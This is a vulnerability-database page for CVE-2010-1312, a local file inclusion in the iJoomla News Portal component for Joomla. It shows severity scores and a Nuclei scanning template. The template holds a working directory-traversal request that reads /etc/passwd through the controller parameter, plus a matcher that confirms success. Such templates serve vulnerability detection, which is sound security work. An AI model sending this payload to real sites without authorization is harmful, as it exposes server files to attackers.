Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1312
HistorySep 05, 2021 - 1:55 a.m.

Joomla! Component News Portal 1.5.x - Local File Inclusion

2021-09-0501:55:43
ProjectDiscovery
github.com
5
joomla
component
news portal
local file inclusion
directory traversal
remote attackers
unauthorized access
data leakage
vulnerability
upgrade
ijoomla
exploit-db
packetstorm
cve-2010-1312

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.5

Confidence

Low

EPSS

0.011

Percentile

85.0%

A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1312

info:
  name: Joomla! Component News Portal 1.5.x - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12077
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1312
    - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1312
    cwe-id: CWE-22
    epss-score: 0.01155
    epss-percentile: 0.84812
    cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ijoomla
    product: com_news_portal
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220027648d4d4ad81d25673691592a865aeba4edbbc49bb98f22254932f7cdf8396022100ec67dfc163a844ed2d62e9bd3f63faf0afa4b51563dd5801c7926ddfe9caa690:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.5

Confidence

Low

EPSS

0.011

Percentile

85.0%

Related for NUCLEI:CVE-2010-1312